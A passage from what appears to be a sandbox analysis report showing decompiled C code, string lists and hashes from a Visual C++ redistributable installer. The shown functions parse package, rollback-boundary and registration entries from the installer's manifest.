                                                                          																													_t283 =  *((intOrPtr*)(_t360 + 0xd0));
                                                                          																													if( *( *((intOrPtr*)(_t360 + 0xd0)) + _t348 * 4) != 0) {
                                                                          																														E000554EF( *((intOrPtr*)(_t283 + _t348 * 4)));
                                                                          																														 *( *((intOrPtr*)(_t360 + 0xd0)) + _t348 * 4) =  *( *((intOrPtr*)(_t360 + 0xd0)) + _t348 * 4) & 0x00000000;
                                                                          																													}
                                                                          																												}
                                                                          																												_t348 = _t348 + 1;
                                                                          																											} while (_t348 <  *((intOrPtr*)(_t360 + 0xd4)));
                                                                          																											_t318 = _a4;
                                                                          																											_t279 = _v32;
                                                                          																											_t336 = _v36;
                                                                          																											L102:
                                                                          																											_t336 = _t336 + 1;
                                                                          																											_t279 = _t279 + 0xe0;
                                                                          																											_v36 = _t336;
                                                                          																											_v32 = _t279;
                                                                          																										} while (_t336 <  *((intOrPtr*)(_t318 + 0xc)));
                                                                          																										_t347 = _v28;
                                                                          																										goto L104;
                                                                          																										L105:
                                                                          																										_t275 = _t275 + 1;
                                                                          																										_t347 = _t347 + 0xe0;
                                                                          																										_a8 = _t275;
                                                                          																										_v28 = _t347;
                                                                          																									} while (_t275 <  *((intOrPtr*)(_t318 + 0xc)));
                                                                          																									goto L106;
                                                                          																								}
                                                                          																								_t349 = 0x8007000e;
                                                                          																								_t351 = 0x8007000e;
                                                                          																								E000137D3(_t274, "package.cpp", 0x100, 0x8007000e);
                                                                          																								_push("Failed to allocate memory for patch sequence information to package lookup.");
                                                                          																								L87:
                                                                          																								_push(_t349);
                                                                          																								goto L109;
                                                                          																							}
                                                                          																							_t349 = 0x8007000e;
                                                                          																							_t351 = 0x8007000e;
                                                                          																							E000137D3(_t271, "package.cpp", 0xfd, 0x8007000e);
                                                                          																							_push("Failed to allocate memory for MSP patch sequence information.");
                                                                          																							goto L87;
                                                                          																						}
                                                                          																					}
                                                                          																					 *(_t346 + 0x8c) = 4;
                                                                          																					_t351 = E00036F47(_v8, _t346);
                                                                          																					if(_t351 < 0) {
                                                                          																						_push("Failed to parse MSU package.");
                                                                          																						goto L108;
                                                                          																					}
                                                                          																					goto L66;
                                                                          																				}
                                                                          																				 *(_t346 + 0x8c) = 3;
                                                                          																				_t351 = E0003643A(_t318, _v8, _t346);
                                                                          																				if(_t351 < 0) {
                                                                          																					_push("Failed to parse MSP package.");
                                                                          																					goto L108;
                                                                          																				}
                                                                          																				_v28 = _v28 + 1;
                                                                          																				goto L66;
                                                                          																			}
                                                                          																			 *(_t346 + 0x8c) = _t329;
                                                                          																			_t292 = E00034888(_t340, _v8, _t346); // executed
                                                                          																			_t351 = _t292;
                                                                          																			if(_t351 >= 0) {
                                                                          																				goto L66;
                                                                          																			}
                                                                          																			_push("Failed to parse MSI package.");
                                                                          																			goto L108;
                                                                          																		}
                                                                          																		 *(_t346 + 0x8c) = 1;
                                                                          																		_t351 = E000325AF(_t328, _v8, _t346);
                                                                          																		if(_t351 >= 0) {
                                                                          																			goto L66;
                                                                          																		}
                                                                          																		_push("Failed to parse EXE package.");
                                                                          																		goto L108;
                                                                          																	}
                                                                          																	if(_t351 < 0) {
                                                                          																		_push("Failed to get @RollbackBoundaryBackward.");
                                                                          																		goto L108;
                                                                          																	}
                                                                          																	_t351 = E0001D82F(_t318, _v16, _t346 + 0x3c);
                                                                          																	if(_t351 < 0) {
                                                                          																		_push(_v16);
                                                                          																		_push("Failed to find backward transaction boundary: %ls");
                                                                          																		goto L119;
                                                                          																	}
                                                                          																	goto L55;
                                                                          																}
                                                                          																if(_t351 < 0) {
                                                                          																	_push("Failed to get @RollbackBoundaryForward.");
                                                                          																	goto L108;
                                                                          																}
                                                                          																_t351 = E0001D82F(_t318, _v16, _t346 + 0x38);
                                                                          																if(_t351 < 0) {
                                                                          																	_push(_v16);
                                                                          																	_push("Failed to find forward transaction boundary: %ls");
                                                                          																	goto L119;
                                                                          																}
                                                                          																goto L52;
                                                                          															} else {
                                                                          																_push("Failed to get @InstallCondition.");
                                                                          																goto L108;
                                                                          															}
                                                                          														} else {
                                                                          															_push("Failed to get @RollbackLogPathVariable.");
                                                                          															goto L108;
                                                                          														}
                                                                          													} else {
                                                                          														_push("Failed to get @LogPathVariable.");
                                                                          														goto L108;
                                                                          													}
                                                                          												}
                                                                          												 *(_t346 + 0x20) = 1;
                                                                          												goto L37;
                                                                          											}
                                                                          											 *(_t346 + 0x20) =  *(_t346 + 0x20) & 0x00000000;
                                                                          											goto L37;
                                                                          										}
                                                                          										L122:
                                                                          										_push("Failed to get next node.");
                                                                          										goto L108;
                                                                          									}
                                                                          									_t349 = 0x8007000e;
                                                                          									_t351 = 0x8007000e;
                                                                          									E000137D3(_t223, "package.cpp", 0x5f, 0x8007000e);
                                                                          									_push("Failed to allocate memory for package structs.");
                                                                          									goto L87;
                                                                          								}
                                                                          								_push("Failed to get package node count.");
                                                                          								goto L108;
                                                                          							} else {
                                                                          								_push("Failed to select package nodes.");
                                                                          								L108:
                                                                          								_push(_t351);
                                                                          								L109:
                                                                          								E0005012F();
                                                                          								L124:
                                                                          								L125:
                                                                          								_t324 = _v20;
                                                                          								if(_t324 != 0) {
                                                                          									 *((intOrPtr*)( *_t324 + 8))(_t324);
                                                                          								}
                                                                          								_t325 = _v8;
                                                                          								if(_t325 != 0) {
                                                                          									 *((intOrPtr*)( *_t325 + 8))(_t325);
                                                                          								}
                                                                          								if(_v12 != 0) {
                                                                          									__imp__#6(_v12);
                                                                          								}
                                                                          								if(_v16 != 0) {
                                                                          									E000554EF(_v16);
                                                                          								}
                                                                          								return _t351;
                                                                          							}
                                                                          						}
                                                                          						_t302 = E000138D4(_t210 << 3, 1);
                                                                          						 *_t318 = _t302;
                                                                          						if(_t302 != 0) {
                                                                          							_t303 = _v24;
                                                                          							_t350 = 0;
                                                                          							 *((intOrPtr*)(_t318 + 4)) = _t303;
                                                                          							if(_t303 == 0) {
                                                                          								goto L17;
                                                                          							} else {
                                                                          								goto L9;
                                                                          							}
                                                                          							while(1) {
                                                                          								L9:
                                                                          								_v32 =  *_t318 + _t350 * 8;
                                                                          								_t351 = E00053760(_t321, _v20,  &_v8,  &_v12);
                                                                          								if(_t351 < 0) {
                                                                          									goto L122;
                                                                          								}
                                                                          								_t351 = E000531C7(_v8, L"Id", _v32);
                                                                          								if(_t351 < 0) {
                                                                          									goto L121;
                                                                          								}
                                                                          								_t351 = E000533DB(_t321, _v8, L"Vital", _v32 + 4);
                                                                          								if(_t351 < 0) {
                                                                          									goto L112;
                                                                          								}
                                                                          								_t321 = _v8;
                                                                          								if(_t321 != 0) {
                                                                          									 *((intOrPtr*)( *_t321 + 8))(_t321);
                                                                          									_v8 = _v8 & 0x00000000;
                                                                          								}
                                                                          								if(_v12 != 0) {
                                                                          									__imp__#6(_v12);
                                                                          									_v12 = _v12 & 0x00000000;
                                                                          								}
                                                                          								_t350 = _t350 + 1;
                                                                          								if(_t350 < _v24) {
                                                                          									continue;
                                                                          								} else {
                                                                          									goto L17;
                                                                          								}
                                                                          							}
                                                                          							goto L122;
                                                                          						}
                                                                          						_t349 = 0x8007000e;
                                                                          						_t351 = 0x8007000e;
                                                                          						E000137D3(_t302, "package.cpp", 0x34, 0x8007000e);
                                                                          						_push("Failed to allocate memory for rollback boundary structs.");
                                                                          						goto L87;
                                                                          					}
                                                                          					_push("Failed to get rollback bundary node count.");
                                                                          					L2:
                                                                          					_push(_t351);
                                                                          					E0005012F();
                                                                          					goto L125;
                                                                          				}
                                                                          				_push("Failed to select rollback boundary nodes.");
                                                                          				goto L2;
                                                                          			}
                                                                          0x0001e611
                                                                          0x0001e611
                                                                          0x0001e614
                                                                          0x0001e619
                                                                          0x0001e61e
                                                                          0x0001e61e
                                                                          0x0001e625
                                                                          0x0001e62a
                                                                          0x0001e62a
                                                                          0x0001e634
                                                                          0x0001e639
                                                                          0x0001e639
                                                                          0x0001e644
                                                                          0x0001e644
                                                                          0x0001df84
                                                                          0x0001de9d
                                                                          0x0001dea2
                                                                          0x0001dea6
                                                                          0x0001dec6
                                                                          0x0001dec9
                                                                          0x0001decb
                                                                          0x0001ded0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ded6
                                                                          0x0001ded6
                                                                          0x0001dedb
                                                                          0x0001deee
                                                                          0x0001def2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001df08
                                                                          0x0001df0c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001df26
                                                                          0x0001df2a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001df30
                                                                          0x0001df35
                                                                          0x0001df3a
                                                                          0x0001df3d
                                                                          0x0001df3d
                                                                          0x0001df45
                                                                          0x0001df4a
                                                                          0x0001df50
                                                                          0x0001df50
                                                                          0x0001df54
                                                                          0x0001df58
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001df58
                                                                          0x00000000
                                                                          0x0001ded6
                                                                          0x0001dea8
                                                                          0x0001deb5
                                                                          0x0001deb7
                                                                          0x0001debc
                                                                          0x00000000
                                                                          0x0001debc
                                                                          0x0001de80
                                                                          0x0001de60
                                                                          0x0001de60
                                                                          0x0001de61
                                                                          0x00000000
                                                                          0x0001de67
                                                                          0x0001de5b
                                                                          0x00000000

                                                                          APIs
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0001DF4A
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0001E62A
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeHeapString$AllocateProcess
                                                                          • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                                          • API String ID: 336948655-2612374807
                                                                          • Opcode ID: a81d53137853984b1ed41e759b6910e40e517f8a3aa647573862b3a30aac1509
                                                                          • Instruction ID: c0c7d79daeff6e668c277e139110e4174969452a3b6b7c025a48da6c60b35d02
                                                                          • Opcode Fuzzy Hash: a81d53137853984b1ed41e759b6910e40e517f8a3aa647573862b3a30aac1509
                                                                          • Instruction Fuzzy Hash: 9732D231D40666EBDB219B54CC41FEEBBB6AF04729F104265FE11BB291D771AE80CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 67%
                                                                          			E0001F86E(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				short* _v16;
                                                                          				void* _v20;
                                                                          				void* _t88;
                                                                          				void* _t112;
                                                                          				int _t158;
                                                                          				void* _t164;
                                                                          				signed int _t166;
                                                                          				intOrPtr* _t167;
                                                                          				intOrPtr* _t168;
                                                                          				intOrPtr* _t169;
                                                                          				void* _t174;
                                                                          				intOrPtr _t176;
                                                                          				void* _t179;
                                                                          				void* _t188;
                                                                          				void* _t190;
                                                                          
                                                                          				_t174 = __edx;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_t88 = E0005388A(_a8, L"Registration",  &_v12);
                                                                          				_t164 = 0x80070490;
                                                                          				_t179 =  ==  ? 0x80070490 : _t88;
                                                                          				if(_t179 >= 0) {
                                                                          					_push(__edi);
                                                                          					_t176 = _a4;
                                                                          					_t8 = _t176 + 0x10; // 0x1534d
                                                                          					if(E000531C7(_v12, L"Id", _t8) >= 0) {
                                                                          						_t10 = _t176 + 0x14; // 0x15351
                                                                          						if(E000531C7(_v12, L"Tag", _t10) >= 0) {
                                                                          							if(E0001E936(_t176, _t176, _a8) >= 0) {
                                                                          								if(E000531C7(_v12, L"Version",  &_v16) >= 0) {
                                                                          									_t15 = _t176 + 0x38; // 0x15375
                                                                          									if(E00054B5A(_t174, _v16, 0, _t15) >= 0) {
                                                                          										_t18 = _t176 + 0x44; // 0x15381
                                                                          										if(E000531C7(_v12, L"ProviderKey", _t18) >= 0) {
                                                                          											_t20 = _t176 + 0x48; // 0x15385
                                                                          											if(E000531C7(_v12, L"ExecutableName", _t20) >= 0) {
                                                                          												if(E000533DB(_t166, _v12, L"PerMachine", _t176) >= 0) {
                                                                          													_t188 = E0005388A(_v12, L"Arp",  &_v8);
                                                                          													if(_t188 == 1) {
                                                                          														L71:
                                                                          														_t62 = _t176 + 0x98; // 0x153d5
                                                                          														_t63 = _t176 + 0x94; // 0x153d1
                                                                          														if(E0001EBB2(_v12, _t63, _t62) >= 0) {
                                                                          															_t190 = E0005388A(_v12, L"Update",  &_v20);
                                                                          															if(_t190 == 1) {
                                                                          																L88:
                                                                          																_t112 = E0001EFE5(_t166, _t176); // executed
                                                                          																_t190 = _t112;
                                                                          																if(_t190 >= 0) {
                                                                          																	L91:
                                                                          																	L92:
                                                                          																	_t167 = _v12;
                                                                          																	if(_t167 != 0) {
                                                                          																		 *((intOrPtr*)( *_t167 + 8))(_t167);
                                                                          																	}
                                                                          																	_t168 = _v8;
                                                                          																	if(_t168 != 0) {
                                                                          																		 *((intOrPtr*)( *_t168 + 8))(_t168);
                                                                          																	}
                                                                          																	_t169 = _v20;
                                                                          																	if(_t169 != 0) {
                                                                          																		 *((intOrPtr*)( *_t169 + 8))(_t169);
                                                                          																	}
                                                                          																	if(_v16 != 0) {
                                                                          																		E000554EF(_v16);
                                                                          																	}
                                                                          																	return _t190;
                                                                          																}
                                                                          																_push("Failed to set registration paths.");
                                                                          																L90:
                                                                          																_push(_t190);
                                                                          																E0005012F();
                                                                          																goto L91;
                                                                          															}
                                                                          															if(_t190 >= 0) {
                                                                          																 *((intOrPtr*)(_t176 + 0x9c)) = 1;
                                                                          																_t68 = _t176 + 0xa0; // 0x153dd
                                                                          																_t190 = E000531C7(_v20, L"Manufacturer", _t68);
                                                                          																if(_t190 >= 0) {
                                                                          																	_t70 = _t176 + 0xa4; // 0x153e1
                                                                          																	_t190 = E000531C7(_v20, L"Department", _t70);
                                                                          																	if(_t190 == _t164 || _t190 >= 0) {
                                                                          																		_t72 = _t176 + 0xa8; // 0x153e5
                                                                          																		_t190 = E000531C7(_v20, L"ProductFamily", _t72);
                                                                          																		if(_t190 == _t164 || _t190 >= 0) {
                                                                          																			_t74 = _t176 + 0xac; // 0x153e9
                                                                          																			_t190 = E000531C7(_v20, L"Name", _t74);
                                                                          																			if(_t190 >= 0) {
                                                                          																				_t76 = _t176 + 0xb0; // 0x153ed
                                                                          																				_t190 = E000531C7(_v20, L"Classification", _t76);
                                                                          																				if(_t190 >= 0) {
                                                                          																					goto L88;
                                                                          																				}
                                                                          																				_push("Failed to get @Classification.");
                                                                          																				goto L90;
                                                                          																			}
                                                                          																			_push("Failed to get @Name.");
                                                                          																		} else {
                                                                          																			_push("Failed to get @ProductFamily.");
                                                                          																		}
                                                                          																	} else {
                                                                          																		_push("Failed to get @Department.");
                                                                          																	}
                                                                          																	goto L90;
                                                                          																}
                                                                          																_push("Failed to get @Manufacturer.");
                                                                          																goto L90;
                                                                          															}
                                                                          															_push("Failed to select Update node.");
                                                                          															goto L90;
                                                                          														}
                                                                          														_push("Failed to parse software tag.");
                                                                          														goto L90;
                                                                          													}
                                                                          													if(_t188 >= 0) {
                                                                          														_t25 = _t176 + 4; // 0x15341
                                                                          														_t190 = E000533DB(_t166, _v8, L"Register", _t25);
                                                                          														if(_t190 >= 0) {
                                                                          															_t27 = _t176 + 0x60; // 0x1539d
                                                                          															_t190 = E000531C7(_v8, L"DisplayName", _t27);
                                                                          															if(_t190 == 0x80070490 || _t190 >= 0) {
                                                                          																_t29 = _t176 + 0x64; // 0x153a1
                                                                          																_t190 = E000531C7(_v8, L"DisplayVersion", _t29);
                                                                          																if(_t190 == _t164 || _t190 >= 0) {
                                                                          																	_t31 = _t176 + 0x68; // 0x153a5
                                                                          																	_t190 = E000531C7(_v8, L"Publisher", _t31);
                                                                          																	if(_t190 == _t164 || _t190 >= 0) {
                                                                          																		_t33 = _t176 + 0x6c; // 0x153a9
                                                                          																		_t190 = E000531C7(_v8, L"HelpLink", _t33);
                                                                          																		if(_t190 == _t164 || _t190 >= 0) {
                                                                          																			_t35 = _t176 + 0x70; // 0x153ad
                                                                          																			_t190 = E000531C7(_v8, L"HelpTelephone", _t35);
                                                                          																			if(_t190 == _t164 || _t190 >= 0) {
                                                                          																				_t37 = _t176 + 0x74; // 0x153b1
                                                                          																				_t190 = E000531C7(_v8, L"AboutUrl", _t37);
                                                                          																				if(_t190 == _t164 || _t190 >= 0) {
                                                                          																					_t39 = _t176 + 0x78; // 0x153b5
                                                                          																					_t190 = E000531C7(_v8, L"UpdateUrl", _t39);
                                                                          																					if(_t190 == _t164 || _t190 >= 0) {
                                                                          																						_t41 = _t176 + 0x7c; // 0x153b9
                                                                          																						_t190 = E000531C7(_v8, L"ParentDisplayName", _t41);
                                                                          																						if(_t190 == _t164 || _t190 >= 0) {
                                                                          																							_t43 = _t176 + 0x80; // 0x153bd
                                                                          																							_t190 = E000531C7(_v8, L"Comments", _t43);
                                                                          																							if(_t190 == _t164 || _t190 >= 0) {
                                                                          																								_t45 = _t176 + 0x84; // 0x153c1
                                                                          																								_t190 = E000531C7(_v8, L"Contact", _t45);
                                                                          																								if(_t190 == _t164 || _t190 >= 0) {
                                                                          																									_t190 = E000531C7(_v8, L"DisableModify",  &_v16);
                                                                          																									if(_t190 < 0) {
                                                                          																										if(_t190 == _t164) {
                                                                          																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
                                                                          																											_t190 = 0;
                                                                          																										}
                                                                          																										L65:
                                                                          																										if(_t190 >= 0) {
                                                                          																											_t59 = _t176 + 0x90; // 0x153cd
                                                                          																											_t190 = E000533DB(_t166, _v8, L"DisableRemove", _t59);
                                                                          																											if(_t190 == _t164) {
                                                                          																												goto L71;
                                                                          																											}
                                                                          																											if(_t190 >= 0) {
                                                                          																												 *(_t176 + 0x8c) = 1;
                                                                          																												goto L71;
                                                                          																											}
                                                                          																											_push("Failed to get @DisableRemove.");
                                                                          																											goto L90;
                                                                          																										}
                                                                          																										_push("Failed to get @DisableModify.");
                                                                          																										goto L90;
                                                                          																									}
                                                                          																									_t158 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"button", 0xffffffff);
                                                                          																									_t166 = 2;
                                                                          																									if(_t158 != _t166) {
                                                                          																										if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"yes", 0xffffffff) != 2) {
                                                                          																											if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"no", 0xffffffff) != 2) {
                                                                          																												_t190 = 0x8000ffff;
                                                                          																												E000137D3(_t160, "registration.cpp", 0xf6, 0x8000ffff);
                                                                          																												_push(_v16);
                                                                          																												_push("Invalid modify disabled type: %ls");
                                                                          																												L62:
                                                                          																												_push(_t190);
                                                                          																												E0005012F();
                                                                          																												goto L91;
                                                                          																											}
                                                                          																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
                                                                          																											L60:
                                                                          																											_t164 = 0x80070490;
                                                                          																											goto L65;
                                                                          																										}
                                                                          																										 *(_t176 + 0x88) = 1;
                                                                          																										goto L60;
                                                                          																									}
                                                                          																									 *(_t176 + 0x88) = _t166;
                                                                          																									goto L60;
                                                                          																								} else {
                                                                          																									_push("Failed to get @Contact.");
                                                                          																									goto L90;
                                                                          																								}
                                                                          																							} else {
                                                                          																								_push("Failed to get @Comments.");
                                                                          																								goto L90;
                                                                          																							}
                                                                          																						} else {
                                                                          																							_push("Failed to get @ParentDisplayName.");
                                                                          																							goto L90;
                                                                          																						}
                                                                          																					} else {
                                                                          																						_push("Failed to get @UpdateUrl.");
                                                                          																						goto L90;
                                                                          																					}
                                                                          																				} else {
                                                                          																					_push("Failed to get @AboutUrl.");
                                                                          																					goto L90;
                                                                          																				}
                                                                          																			} else {
                                                                          																				_push("Failed to get @HelpTelephone.");
                                                                          																				goto L90;
                                                                          																			}
                                                                          																		} else {
                                                                          																			_push("Failed to get @HelpLink.");
                                                                          																			goto L90;
                                                                          																		}
                                                                          																	} else {
                                                                          																		_push("Failed to get @Publisher.");
                                                                          																		goto L90;
                                                                          																	}
                                                                          																} else {
                                                                          																	_push("Failed to get @DisplayVersion.");
                                                                          																	goto L90;
                                                                          																}
                                                                          															} else {
                                                                          																_push("Failed to get @DisplayName.");
                                                                          																goto L90;
                                                                          															}
                                                                          														}
                                                                          														_push("Failed to get @Register.");
                                                                          														goto L90;
                                                                          													}
                                                                          													_push("Failed to select ARP node.");
                                                                          													goto L90;
                                                                          												}
                                                                          												_push("Failed to get @PerMachine.");
                                                                          												goto L90;
                                                                          											}
                                                                          											_push("Failed to get @ExecutableName.");
                                                                          											goto L90;
                                                                          										}
                                                                          										_push("Failed to get @ProviderKey.");
                                                                          										goto L90;
                                                                          									}
                                                                          									_push(_v16);
                                                                          									_push("Failed to parse @Version: %ls");
                                                                          									goto L62;
                                                                          								}
                                                                          								_push("Failed to get @Version.");
                                                                          								goto L90;
                                                                          							}
                                                                          							_push("Failed to parse related bundles");
                                                                          							goto L90;
                                                                          						}
                                                                          						_push("Failed to get @Tag.");
                                                                          						goto L90;
                                                                          					}
                                                                          					_push("Failed to get @Id.");
                                                                          					goto L90;
                                                                          				}
                                                                          				_push("Failed to select registration node.");
                                                                          				_push(_t179);
                                                                          				E0005012F();
                                                                          				goto L92;
                                                                          			}




















                                                                          0x0001fa8e
                                                                          0x0001fa69
                                                                          0x0001fa69
                                                                          0x00000000
                                                                          0x0001fa69
                                                                          0x0001fa44
                                                                          0x0001fa44
                                                                          0x00000000
                                                                          0x0001fa44
                                                                          0x0001fa1f
                                                                          0x0001fa1f
                                                                          0x00000000
                                                                          0x0001fa1f
                                                                          0x0001fa19
                                                                          0x0001f9fa
                                                                          0x00000000
                                                                          0x0001f9fa
                                                                          0x0001f9d9
                                                                          0x00000000
                                                                          0x0001f9d9
                                                                          0x0001f9af
                                                                          0x00000000
                                                                          0x0001f9af
                                                                          0x0001f991
                                                                          0x00000000
                                                                          0x0001f991
                                                                          0x0001f970
                                                                          0x00000000
                                                                          0x0001f970
                                                                          0x0001f94c
                                                                          0x0001f94f
                                                                          0x00000000
                                                                          0x0001f94f
                                                                          0x0001f92e
                                                                          0x00000000
                                                                          0x0001f92e
                                                                          0x0001f90d
                                                                          0x00000000
                                                                          0x0001f90d
                                                                          0x0001f8f4
                                                                          0x00000000
                                                                          0x0001f8f4
                                                                          0x0001f8d3
                                                                          0x00000000
                                                                          0x0001f8d3
                                                                          0x0001f8a6
                                                                          0x0001f8ab
                                                                          0x0001f8ac
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                          • API String ID: 0-2956246334
                                                                          • Opcode ID: 740b7063b8bc62459de127fa69f455638e7cf86b0abf9ca5400e3bc0c3fd2ffb
                                                                          • Instruction ID: 28652cd8e0ea88d0bf34c7eef1507b6adc299f3206120d8914107bdf4e2bbfa9
                                                                          • Opcode Fuzzy Hash: 740b7063b8bc62459de127fa69f455638e7cf86b0abf9ca5400e3bc0c3fd2ffb
                                                                          • Instruction Fuzzy Hash: 19E1D832E84777BBCB21A6A0CC42EFE7AA6AB00754F150275FE11FB251D7A15E8097C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 67%
                                                                          			E0001B389(union _LARGE_INTEGER* __edx, void* _a4, void* _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				union _LARGE_INTEGER _v12;
                                                                          				void _v72;
                                                                          				signed short _v300;
                                                                          				signed int _v314;
                                                                          				void _v320;
                                                                          				union _LARGE_INTEGER _v340;
                                                                          				long _v344;
                                                                          				void _v360;
                                                                          				long _v364;
                                                                          				union _LARGE_INTEGER* _v368;
                                                                          				intOrPtr _v372;
                                                                          				void _v376;
                                                                          				void _v380;
                                                                          				struct _OVERLAPPED* _v384;
                                                                          				intOrPtr _v388;
                                                                          				union _LARGE_INTEGER _v392;
                                                                          				intOrPtr _v396;
                                                                          				char _v400;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t98;
                                                                          				intOrPtr _t106;
                                                                          				int _t108;
                                                                          				int _t117;
                                                                          				int _t120;
                                                                          				union _LARGE_INTEGER _t123;
                                                                          				int _t124;
                                                                          				int _t133;
                                                                          				signed short _t137;
                                                                          				intOrPtr* _t142;
                                                                          				int _t151;
                                                                          				intOrPtr _t160;
                                                                          				signed short _t188;
                                                                          				signed short _t191;
                                                                          				signed short _t196;
                                                                          				signed short _t199;
                                                                          				signed short _t202;
                                                                          				signed short _t205;
                                                                          				signed short _t208;
                                                                          				signed short _t211;
                                                                          				signed short _t214;
                                                                          				signed short _t217;
                                                                          				signed short _t220;
                                                                          				signed int _t224;
                                                                          				void* _t226;
                                                                          				intOrPtr _t237;
                                                                          				void _t241;
                                                                          				intOrPtr _t242;
                                                                          				union _LARGE_INTEGER* _t243;
                                                                          				void* _t244;
                                                                          				void* _t247;
                                                                          				void* _t248;
                                                                          				void* _t252;
                                                                          				signed int _t290;
                                                                          
                                                                          				_t243 = __edx;
                                                                          				_t98 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t98 ^ _t290;
                                                                          				_t223 = _a4;
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				_v364 = 0;
                                                                          				asm("movlpd [ebp-0x18c], xmm0");
                                                                          				E0003F670(_t244,  &_v72, 0, 0x40);
                                                                          				E0003F670(_t244,  &_v320, 0, 0xf8);
                                                                          				_v376 = 0;
                                                                          				_v380 = 0;
                                                                          				_v368 = 0;
                                                                          				_t224 = 0xa;
